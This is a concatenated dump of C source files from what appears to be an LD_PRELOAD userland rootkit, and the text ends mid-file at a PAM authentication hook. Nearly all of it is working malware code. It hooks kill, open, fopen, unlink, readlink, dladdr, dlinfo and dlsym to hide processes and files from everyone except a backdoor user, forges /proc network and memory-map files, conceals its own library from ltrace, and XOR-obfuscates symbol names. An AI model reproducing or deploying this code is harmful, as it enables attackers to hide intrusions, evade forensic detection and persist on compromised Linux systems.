(long)call(CSETRESGID, rgid, egid, sgid); 9 | } 10 | -------------------------------------------------------------------------------- /src/LD/hooks/kill.c: -------------------------------------------------------------------------------- 1 | int kill(pid_t pid, int sig){ 2 | if(is_bdusr()) 3 | goto o_kill; 4 | if(hidden_proc(pid)){ 5 | errno = ESRCH; 6 | return -1; 7 | } 8 | o_kill: 9 | hook(CKILL); 10 | return (long)call(CKILL, pid, sig); 11 | } 12 | -------------------------------------------------------------------------------- /src/LD/hooks/libdl/dladdr.c: -------------------------------------------------------------------------------- 1 | #include "../../util/util.h" 2 | 3 | int dladdr(const void *addr, Dl_info *info){ 4 | hook(CDLADDR); 5 | if(is_bdusr()) 6 | return (long)call(CDLADDR, addr, info); 7 | Dl_info bdvl_info; 8 | if((long)call(CDLADDR, addr, &bdvl_info) != 0 && xstrstr(BDVLSO, bdvl_info.dli_fname)) 9 | return 0; 10 | return (long)call(CDLADDR, addr, info); 11 | } 12 | -------------------------------------------------------------------------------- /src/LD/hooks/libdl/dlinfo.c: -------------------------------------------------------------------------------- 1 | #include "../../util/util.h" 2 | 3 | static struct link_map *bdvl_linkmap; 4 | 5 | static void repair_linkmap(void){ 6 | bdvl_linkmap->l_prev->l_next = bdvl_linkmap; 7 | bdvl_linkmap->l_next->l_prev = bdvl_linkmap; 8 | } 9 | 10 | int dlinfo(void *handle, int request, void *p){ 11 | hook(CDLINFO); 12 | if(is_bdusr()) 13 | return (long)call(CDLINFO, handle, request, p); 14 | if(request == 2){ 15 | struct link_map *loop; 16 | call(CDLINFO, handle, request, &loop); 17 | do{ 18 | loop = loop->l_next; 19 | if(strcmp(loop->l_name, "\0")) 20 | if(xstrstr(BDVLSO, loop->l_name)){ 21 | bdvl_linkmap = loop; 22 | loop->l_name = strdup(FAKE_LINKMAP_NAME); 23 | if(process("ltrace")){ 24 | atexit(repair_linkmap); 25 | loop->l_prev->l_next = loop->l_next; 26 | loop->l_next->l_prev = loop->l_prev; 27 | } 28 | } 29 | }while(loop != NULL && loop->l_name != NULL && loop->l_next != NULL); 30 | } 31 | return (long)call(CDLINFO, handle, request, p); 32 | } 33 | -------------------------------------------------------------------------------- /src/LD/hooks/libdl/dlsym.c: -------------------------------------------------------------------------------- 1 | static void get_libc_symbol(const char *symbol, void **funcptr){ 2 | if(funcptr != NULL) 3 | return; 4 | void *libc_handle = dlopen(LIBC_PATH, RTLD_DEEPBIND); 5 | char *curcall; 6 | int i; 7 | for(i = 0; i < LIBC_CALLS_SIZE; i++){ 8 | curcall = libc_calls[i]; 9 | if(!xstrncmp(symbol,curcall)){ 10 | *funcptr = o_dlsym(libc_handle, symbol); 11 | break; 12 | } 13 | } 14 | } 15 | 16 | static void get_libdl_symbol(const char *symbol, void **funcptr){ 17 | if(funcptr != NULL) 18 | return; 19 | void *libdl_handle = dlopen(LIBDL_PATH, RTLD_DEEPBIND); 20 | char *curcall; 21 | int i; 22 | for(i = 0; i < LIBDL_CALLS_SIZE; i++){ 23 | curcall = libdl_calls[i]; 24 | if(!xstrncmp(symbol,curcall)){ 25 | *funcptr = o_dlsym(libdl_handle, symbol); 26 | break; 27 | } 28 | } 29 | } 30 | 31 | static void get_libpam_symbol(const char *symbol, void **funcptr){ 32 | if(funcptr != NULL) 33 | return; 34 | void *libpam_handle = dlopen(LIBPAM_PATH, RTLD_DEEPBIND); 35 | char *curcall; 36 | int i; 37 | for(i = 0; i < LIBPAM_CALLS_SIZE; i++){ 38 | curcall = libpam_calls[i]; 39 | if(!xstrncmp(symbol,curcall)){ 40 | *funcptr = o_dlsym(libpam_handle, symbol); 41 | break; 42 | } 43 | } 44 | } 45 | 46 | static void get_libpcap_symbol(const char *symbol, void **funcptr){ 47 | if(funcptr != NULL) 48 | return; 49 | void *libpcap_handle = dlopen(LIBPCAP_PATH, RTLD_DEEPBIND); 50 | char *curcall; 51 | int i; 52 | for(i = 0; i < LIBPCAP_CALLS_SIZE; i++){ 53 | curcall = libpcap_calls[i]; 54 | if(!xstrncmp(symbol,curcall)){ 55 | *funcptr = o_dlsym(libpcap_handle, symbol); 56 | break; 57 | } 58 | } 59 | } 60 | 61 | static void locate_dlsym(void){ 62 | if(o_dlsym != NULL) 63 | return; 64 | char buf[32]; 65 | int a, b; 66 | for(a = 0; a < GLIBC_MAX_VER; a++){ 67 | snprintf(buf, sizeof(buf), GLIBC_VER_STR, a); 68 | if((o_dlsym = (void*(*)(void *handle, const char *name))dlvsym(RTLD_NEXT, "dlsym", buf))) 69 | return; 70 | } 71 | for(a = 0; a < GLIBC_MAX_VER; a++) 72 | for(b = 0; b < GLIBC_MAX_VER; b++){ 73 | snprintf(buf, sizeof(buf), GLIBC_VERVER_STR, a, b); 74 | if((o_dlsym = (void*(*)(void *handle, const char *name))dlvsym(RTLD_NEXT, "dlsym", buf))) 75 | return; 76 | } 77 | if(o_dlsym == NULL) 78 | exit(0); 79 | } 80 | 81 | void *dlsym(void *handle, const char *symbol){ 82 | void *ptr = NULL; 83 | locate_dlsym(); 84 | get_libc_symbol(symbol, &ptr); 85 | get_libdl_symbol(symbol, &ptr); 86 | get_libpam_symbol(symbol, &ptr); 87 | get_libpcap_symbol(symbol, &ptr); 88 | if(ptr == NULL) 89 | ptr = o_dlsym(handle, symbol); 90 | return ptr; 91 | } 92 | -------------------------------------------------------------------------------- /src/LD/hooks/libdl/gsym.c: -------------------------------------------------------------------------------- 1 | static void get_symbol_pointer(int symbol_index, void *handle){ 2 | if(symbols[symbol_index].func != NULL || all[symbol_index] == NULL) 3 | return; 4 | locate_dlsym(); 5 | xor(symbol_name, all[symbol_index]); 6 | if(strlen(symbol_name) < 2) 7 | goto end_get_symbol_pointer; 8 | symbols[symbol_index].func = o_dlsym(handle, symbol_name); 9 | end_get_symbol_pointer: 10 | clean(symbol_name); 11 | return; 12 | } 13 | 14 | static void _hook(void *handle, ...){ 15 | int symbol_index; 16 | va_list va; 17 | va_start(va, handle); 18 | while((symbol_index = va_arg(va, int)) > -1){ 19 | if(symbol_index > ALL_SIZE) 20 | break; 21 | get_symbol_pointer(symbol_index, handle); 22 | } 23 | va_end(va); 24 | return; 25 | } 26 | -------------------------------------------------------------------------------- /src/LD/hooks/libdl/libdl.h: -------------------------------------------------------------------------------- 1 | #ifndef LIBDL_H 2 | #define LIBDL_H 3 | 4 | #include "util/xor.c" 5 | 6 | #define LIBC_PATH "libc.so.6" 7 | #define LIBDL_PATH "libdl.so.1" 8 | #define LIBPAM_PATH "libpam.so.0" 9 | #define LIBPCAP_PATH "libpcap.so" 10 | 11 | #define GLIBC_VER_STR "GLIBC_2.%d" 12 | #define GLIBC_VERVER_STR "GLIBC_2.%d.%d" 13 | #define GLIBC_MAX_VER 40 14 | 15 | #define FAKE_LINKMAP_NAME "(filo)" 16 | 17 | extern void *_dl_sym(void *, const char *, void *); 18 | typeof(dlsym) *o_dlsym; 19 | 20 | static void get_libc_symbol(const char *symbol, void **funcptr); 21 | static void get_libdl_symbol(const char *symbol, void **funcptr); 22 | static void get_libpam_symbol(const char *symbol, void **funcptr); 23 | static void get_libpcap_symbol(const char *symbol, void **funcptr); 24 | 25 | static void locate_dlsym(void); 26 | void *dlsym(void *handle, const char *symbol); 27 | 28 | static void get_symbol_pointer(int symbol_index, void *handle); 29 | static void _hook(void *handle, ...); 30 | #include "gsym.c" 31 | 32 | static int xfnmatch(const char *pattern, const char *string); 33 | static char *xstrstr(const char *pattern, const char *string); 34 | static int xstrncmp(const char *string, const char *pattern); 35 | static int xprintf(const char *string); 36 | static size_t xfwrite(const char *str, size_t nmemb, FILE *stream); 37 | static FILE *xfopen(const char *path, const char *mode); 38 | static void *xdlsym(void *handle, const char *symbol); 39 | #define hook(...) _hook(RTLD_NEXT, __VA_ARGS__) 40 | #define call(symbol_index, ...) symbols[symbol_index].func(__VA_ARGS__) 41 | #include "util/xor_wrappers.h" 42 | #include "dlsym.c" 43 | 44 | int dladdr(const void *addr, Dl_info *info); 45 | #include "dladdr.c" 46 | 47 | static void repair_linkmap(void); 48 | int dlinfo(void *handle, int request, void *p); 49 | #include "dlinfo.c" 50 | 51 | #endif 52 | -------------------------------------------------------------------------------- /src/LD/hooks/ln/links.h: -------------------------------------------------------------------------------- 1 | #ifndef LINKS_H 2 | #define LINKS_H 3 | 4 | int unlink(const char *pathname); 5 | int unlinkat(int dirfd, const char *pathname, int flags); 6 | #include "unlink.c" 7 | 8 | ssize_t readlink(const char *pathname, char *buf, size_t bufsiz); 9 | ssize_t readlinkat(int dirfd, const char *pathname, char *buf, size_t bufsiz); 10 | #include "readlink.c" 11 | 12 | int symlink(const char *target, const char *linkpath); 13 | int symlinkat(const char *target, int newdirfd, const char *linkpath); 14 | #include "symlink.c" 15 | 16 | #endif 17 | -------------------------------------------------------------------------------- /src/LD/hooks/ln/readlink.c: -------------------------------------------------------------------------------- 1 | ssize_t readlink(const char *pathname, char *buf, size_t bufsiz){ 2 | hook(CREADLINK); 3 | if(is_bdusr()) 4 | return (ssize_t)call(CREADLINK, pathname, buf, bufsiz); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (ssize_t)call(CREADLINK, pathname, buf, bufsiz); 10 | } 11 | 12 | ssize_t readlinkat(int dirfd, const char *pathname, char *buf, size_t bufsiz){ 13 | hook(CREADLINKAT); 14 | if(is_bdusr()) 15 | return (ssize_t)call(CREADLINKAT, dirfd, pathname, buf, bufsiz); 16 | if(hidden_path(pathname) || hidden_fd(dirfd)){ 17 | errno = ENOENT; 18 | return -1; 19 | } 20 | return (ssize_t)call(CREADLINKAT, dirfd, pathname, buf, bufsiz); 21 | } 22 | -------------------------------------------------------------------------------- /src/LD/hooks/ln/symlink.c: -------------------------------------------------------------------------------- 1 | int symlink(const char *target, const char *linkpath){ 2 | hook(CSYMLINK); 3 | if(is_bdusr()) 4 | return (long)call(CSYMLINK, target, linkpath); 5 | if(hidden_path(target) || hidden_path(linkpath)){ 6 | errno=ENOENT; 7 | return -1; 8 | } 9 | return (long)call(CSYMLINK, target, linkpath); 10 | } 11 | 12 | int symlinkat(const char *target, int newdirfd, const char *linkpath){ 13 | hook(CSYMLINKAT); 14 | if(is_bdusr()) 15 | return (long)call(CSYMLINKAT, target, newdirfd, linkpath); 16 | if(hidden_path(target) || hidden_fd(newdirfd) || hidden_path(linkpath)){ 17 | errno=ENOENT; 18 | return -1; 19 | } 20 | return (long)call(CSYMLINKAT, target, newdirfd, linkpath); 21 | } 22 | -------------------------------------------------------------------------------- /src/LD/hooks/ln/unlink.c: -------------------------------------------------------------------------------- 1 | int unlink(const char *pathname){ 2 | hook(CUNLINK); 3 | if(is_bdusr()) 4 | return (long)call(CUNLINK, pathname); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(CUNLINK, pathname); 10 | } 11 | 12 | int unlinkat(int dirfd, const char *pathname, int flags){ 13 | hook(CUNLINKAT); 14 | if(is_bdusr()) 15 | return (long)call(CUNLINKAT, dirfd, pathname, flags); 16 | if(hidden_path(pathname) || hidden_fd(dirfd)){ 17 | errno = ENOENT; 18 | return -1; 19 | } 20 | return (long)call(CUNLINKAT, dirfd, pathname, flags); 21 | } 22 | -------------------------------------------------------------------------------- /src/LD/hooks/open/access.c: -------------------------------------------------------------------------------- 1 | int access(const char *pathname, int amode){ 2 | hook(CACCESS); 3 | if(is_bdusr()) 4 | return (long)call(CACCESS, pathname, amode); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return -1; 8 | } 9 | return (long)call(CACCESS, pathname, amode); 10 | } 11 | 12 | int creat(const char *pathname, mode_t mode){ 13 | hook(CCREAT); 14 | if(is_bdusr()) 15 | return (long)call(CCREAT, pathname, mode); 16 | if(hidden_path(pathname)){ 17 | errno = ENOENT; 18 | return -1; 19 | } 20 | return (long)call(CCREAT, pathname, mode); 21 | } 22 | 23 | int creat64(const char *pathname, mode_t mode){ 24 | hook(CCREAT64); 25 | if(is_bdusr()) 26 | return (long)call(CCREAT64, pathname, mode); 27 | if(hidden_path64(pathname)){ 28 | errno = ENOENT; 29 | return -1; 30 | } 31 | return (long)call(CCREAT64, pathname, mode); 32 | } 33 | 34 | -------------------------------------------------------------------------------- /src/LD/hooks/open/fopen.c: -------------------------------------------------------------------------------- 1 | FILE *fopen(const char *pathname, const char *mode){ 2 | hook(CFOPEN); 3 | if(is_bdusr()) 4 | return call(CFOPEN, pathname, mode); 5 | if(hidden_path(pathname)){ 6 | errno = ENOENT; 7 | return NULL; 8 | } 9 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6")) 10 | return forge_procnet(pathname); 11 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME)) 12 | return forge_maps(pathname); 13 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 14 | return forge_smaps(pathname); 15 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 16 | return forge_numamaps(pathname); 17 | char cwd[PROCPATH_MAXLEN]; 18 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 19 | if(!strcmp(cwd, "/proc")){ 20 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME)) 21 | return forge_maps(pathname); 22 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 23 | return forge_smaps(pathname); 24 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 25 | return forge_numamaps(pathname); 26 | } 27 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){ 28 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME)) 29 | return forge_maps(pathname); 30 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME)) 31 | return forge_smaps(pathname); 32 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME)) 33 | return forge_numamaps(pathname); 34 | } 35 | } 36 | return call(CFOPEN, pathname, mode); 37 | } 38 | 39 | FILE *fopen64(const char *pathname, const char *mode){ 40 | hook(CFOPEN64); 41 | if(is_bdusr()) 42 | return call(CFOPEN64, pathname, mode); 43 | if(hidden_path(pathname)){ 44 | errno = ENOENT; 45 | return NULL; 46 | } 47 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp")) 48 | return forge_procnet(pathname); 49 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME)) 50 | return forge_maps(pathname); 51 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 52 | return forge_smaps(pathname); 53 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 54 | return forge_numamaps(pathname); 55 | char cwd[PROCPATH_MAXLEN]; 56 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 57 | if(!strcmp(cwd, "/proc")){ 58 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME)) 59 | return forge_maps(pathname); 60 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 61 | return forge_smaps(pathname); 62 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 63 | return forge_numamaps(pathname); 64 | } 65 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){ 66 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME)) 67 | return forge_maps(pathname); 68 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME)) 69 | return forge_smaps(pathname); 70 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME)) 71 | return forge_numamaps(pathname); 72 | } 73 | } 74 | return call(CFOPEN64, pathname, mode); 75 | } 76 | 77 | FILE *freopen(const char *pathname, const char *mode, FILE *stream){ 78 | hook(CFREOPEN); 79 | if(is_bdusr()) 80 | return call(CFREOPEN, pathname, mode, stream); 81 | if(hidden_path(pathname)){ 82 | errno = ENOENT; 83 | return NULL; 84 | } 85 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp")) 86 | return forge_procnet(pathname); 87 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME)) 88 | return forge_maps(pathname); 89 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 90 | return forge_smaps(pathname); 91 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 92 | return forge_numamaps(pathname); 93 | char cwd[PROCPATH_MAXLEN]; 94 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 95 | if(!strcmp(cwd, "/proc")){ 96 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME)) 97 | return forge_maps(pathname); 98 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 99 | return forge_smaps(pathname); 100 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 101 | return forge_numamaps(pathname); 102 | } 103 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){ 104 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME)) 105 | return forge_maps(pathname); 106 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME)) 107 | return forge_smaps(pathname); 108 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME)) 109 | return forge_numamaps(pathname); 110 | } 111 | } 112 | return call(CFREOPEN, pathname, mode, stream); 113 | } 114 | 115 | FILE *freopen64(const char *pathname, const char *mode, FILE *stream){ 116 | hook(CFREOPEN64); 117 | if(is_bdusr()) 118 | return call(CFREOPEN64, pathname, mode, stream); 119 | if(hidden_path64(pathname)){ 120 | errno = ENOENT; 121 | return NULL; 122 | } 123 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp")) 124 | return forge_procnet(pathname); 125 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME)) 126 | return forge_maps(pathname); 127 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 128 | return forge_smaps(pathname); 129 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 130 | return forge_numamaps(pathname); 131 | char cwd[PROCPATH_MAXLEN]; 132 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 133 | if(!strcmp(cwd, "/proc")){ 134 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME)) 135 | return forge_maps(pathname); 136 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 137 | return forge_smaps(pathname); 138 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 139 | return forge_numamaps(pathname); 140 | } 141 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){ 142 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME)) 143 | return forge_maps(pathname); 144 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME)) 145 | return forge_smaps(pathname); 146 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME)) 147 | return forge_numamaps(pathname); 148 | } 149 | } 150 | return call(CFREOPEN64, pathname, mode, stream); 151 | } 152 | -------------------------------------------------------------------------------- /src/LD/hooks/open/open.c: -------------------------------------------------------------------------------- 1 | #if defined(__GLIBC__) && (__GLIBC_MINOR__ < 26) 2 | int open(const char *pathname, int flags, mode_t mode){ 3 | hook(COPEN); 4 | if(is_bdusr()) 5 | return (long)call(COPEN, pathname, flags, mode); 6 | if(hidden_path(pathname) && ((process("ssh") || process("busybox")) && (flags == (64|1|512)))) 7 | return (long)call(COPEN, "/dev/null", flags, mode); 8 | if(hidden_path(pathname)){ 9 | errno = ENOENT; 10 | return -1; 11 | } 12 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6")) 13 | return fileno(forge_procnet(pathname)); 14 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME)) 15 | return fileno(forge_maps(pathname)); 16 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 17 | return fileno(forge_smaps(pathname)); 18 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 19 | return fileno(forge_numamaps(pathname)); 20 | char cwd[PROCPATH_MAXLEN]; 21 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 22 | if(!strcmp(cwd, "/proc")){ 23 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME)) 24 | return fileno(forge_maps(pathname)); 25 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 26 | return fileno(forge_smaps(pathname)); 27 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 28 | return fileno(forge_numamaps(pathname)); 29 | } 30 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){ 31 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME)) 32 | return fileno(forge_maps(pathname)); 33 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME)) 34 | return fileno(forge_smaps(pathname)); 35 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME)) 36 | return fileno(forge_numamaps(pathname)); 37 | } 38 | } 39 | return (long)call(COPEN, pathname, flags, mode); 40 | } 41 | 42 | int open64(const char *pathname, int flags, mode_t mode){ 43 | hook(COPEN64); 44 | if(is_bdusr()) 45 | return (long)call(COPEN64, pathname, flags, mode); 46 | if(hidden_path64(pathname) && ((process("ssh") || process("busybox")) && (flags == (64|1|512)))) 47 | return (long)call(COPEN64, "/dev/null", flags, mode); 48 | if(hidden_path64(pathname)){ 49 | errno = ENOENT; 50 | return -1; 51 | } 52 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6")) 53 | return fileno(forge_procnet(pathname)); 54 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME)) 55 | return fileno(forge_maps(pathname)); 56 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 57 | return fileno(forge_smaps(pathname)); 58 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 59 | return fileno(forge_numamaps(pathname)); 60 | char cwd[PROCPATH_MAXLEN]; 61 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 62 | if(!strcmp(cwd, "/proc")){ 63 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME)) 64 | return fileno(forge_maps(pathname)); 65 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 66 | return fileno(forge_smaps(pathname)); 67 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 68 | return fileno(forge_numamaps(pathname)); 69 | } 70 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){ 71 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME)) 72 | return fileno(forge_maps(pathname)); 73 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME)) 74 | return fileno(forge_smaps(pathname)); 75 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME)) 76 | return fileno(forge_numamaps(pathname)); 77 | } 78 | } 79 | return (long)call(COPEN64, pathname, flags, mode); 80 | } 81 | #endif 82 | int openat(int fd, const char *pathname, int flags, mode_t mode){ 83 | hook(COPENAT); 84 | if(is_bdusr()) 85 | return (long)call(COPENAT, fd, pathname, flags, mode); 86 | if((hidden_path(pathname) || hidden_fd(fd)) && ((process("ssh") || process("busybox")) && (flags == (64|1|512)))) 87 | return (long)call(COPENAT, fd, "/dev/null", flags, mode); 88 | if(pathname){ 89 | if(hidden_path(pathname)){ 90 | errno = ENOENT; 91 | return -1; 92 | } 93 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6")) 94 | return fileno(forge_procnet(pathname)); 95 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME)) 96 | return fileno(forge_maps(pathname)); 97 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 98 | return fileno(forge_smaps(pathname)); 99 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 100 | return fileno(forge_numamaps(pathname)); 101 | char cwd[PROCPATH_MAXLEN]; 102 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 103 | if(!strcmp(cwd, "/proc")){ 104 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME)) 105 | return fileno(forge_maps(pathname)); 106 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 107 | return fileno(forge_smaps(pathname)); 108 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 109 | return fileno(forge_numamaps(pathname)); 110 | } 111 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){ 112 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME)) 113 | return fileno(forge_maps(pathname)); 114 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME)) 115 | return fileno(forge_smaps(pathname)); 116 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME)) 117 | return fileno(forge_numamaps(pathname)); 118 | } 119 | } 120 | } 121 | return (long)call(COPENAT, fd, pathname, flags, mode); 122 | } 123 | 124 | int openat64(int fd, const char *pathname, int flags, mode_t mode){ 125 | hook(COPENAT64); 126 | if(is_bdusr()) 127 | return (long)call(COPENAT64, fd, pathname, flags, mode); 128 | if((hidden_path64(pathname) || hidden_fd64(fd)) && ((process("ssh") || process("busybox")) && (flags == (64|1|512)))) 129 | return (long)call(COPENAT64, fd, "/dev/null", flags, mode); 130 | if(pathname){ 131 | if(hidden_path64(pathname)){ 132 | errno = ENOENT; 133 | return -1; 134 | } 135 | if(!strcmp(pathname, "/proc/net/tcp") || !strcmp(pathname, "/proc/net/tcp6")) 136 | return fileno(forge_procnet(pathname)); 137 | if(!fnmatch(MAPS_FULL_PATH, pathname, FNM_PATHNAME)) 138 | return fileno(forge_maps(pathname)); 139 | if(!fnmatch(SMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 140 | return fileno(forge_smaps(pathname)); 141 | if(!fnmatch(NMAPS_FULL_PATH, pathname, FNM_PATHNAME)) 142 | return fileno(forge_numamaps(pathname)); 143 | char cwd[PROCPATH_MAXLEN]; 144 | if(getcwd(cwd, sizeof(cwd)) != NULL){ 145 | if(!strcmp(cwd, "/proc")){ 146 | if(!fnmatch(MAPS_PROC_PATH, pathname, FNM_PATHNAME)) 147 | return fileno(forge_maps(pathname)); 148 | if(!fnmatch(SMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 149 | return fileno(forge_smaps(pathname)); 150 | if(!fnmatch(NMAPS_PROC_PATH, pathname, FNM_PATHNAME)) 151 | return fileno(forge_numamaps(pathname)); 152 | } 153 | if(!fnmatch("/proc/*", cwd, FNM_PATHNAME)){ 154 | if(!fnmatch(MAPS_FILENAME, pathname, FNM_PATHNAME)) 155 | return fileno(forge_maps(pathname)); 156 | if(!fnmatch(SMAPS_FILENAME, pathname, FNM_PATHNAME)) 157 | return fileno(forge_smaps(pathname)); 158 | if(!fnmatch(NMAPS_FILENAME, pathname, FNM_PATHNAME)) 159 | return fileno(forge_numamaps(pathname)); 160 | } 161 | } 162 | } 163 | return (long)call(COPENAT64, fd, pathname, flags, mode); 164 | } 165 | -------------------------------------------------------------------------------- /src/LD/hooks/open/open.h: -------------------------------------------------------------------------------- 1 | #ifndef OPEN_H 2 | #define OPEN_H 3 | 4 | #define MAPS_FULL_PATH "/proc/*/maps" 5 | #define SMAPS_FULL_PATH "/proc/*/smaps" 6 | #define NMAPS_FULL_PATH "/proc/*/numa_maps" 7 | 8 | #define MAPS_PROC_PATH "*/maps" 9 | #define SMAPS_PROC_PATH "*/smaps" 10 | #define NMAPS_PROC_PATH "*/numa_maps" 11 | 12 | #define MAPS_FILENAME "maps" 13 | #define SMAPS_FILENAME "smaps" 14 | #define NMAPS_FILENAME "numa_maps" 15 | 16 | #if defined(__GLIBC__) && (__GLIBC_MINOR__ < 26) 17 | int open(const char *pathname, int flags, mode_t mode); 18 | int open64(const char *pathname, int flags, mode_t mode); 19 | #endif 20 | int openat(int fd, const char *pathname, int flags, mode_t mode); 21 | int openat64(int fd, const char *pathname, int flags, mode_t mode); 22 | #include "open.c" 23 | 24 | FILE *fopen(const char *pathname, const char *mode); 25 | FILE *fopen64(const char *pathname, const char *mode); 26 | FILE *freopen(const char *pathname, const char *mode, FILE *stream); 27 | FILE *freopen64(const char *pathname, const char *mode, FILE *stream); 28 | #include "fopen.c" 29 | 30 | int access(const char *pathname, int amode); 31 | int creat(const char *pathname, mode_t mode); 32 | int creat64(const char *pathname, mode_t mode); 33 | #include "access.c" 34 | 35 | #endif 36 | -------------------------------------------------------------------------------- /src/LD/hooks/pam/pam.h: -------------------------------------------------------------------------------- 1 | #ifndef __PAM_H 2 | #define __PAM_H 3 | 4 | #include "pam_private.h" 5 | 6 | int pam_authenticate(pam_handle_t *pamh, int flags); 7 | int pam_open_session(pam_handle_t *pamh, int flags); 8 | int pam_acct_mgmt(pam_handle_t *pamh, int flags); 9 | #include "pam_hooks.c" 10 | 11 | void pam_syslog(const pam_handle_t *pamh, int priority, const char *fmt, ...); 12 | void pam_vsyslog(const pam_handle_t *pamh, int priority, const char *fmt, va_list args); 13 | #include "pam_syslog.c" 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /src/LD/hooks/pam/pam_hooks.c: -------------------------------------------------------------------------------- 1 | int pam_authenticate(pam_handle_t 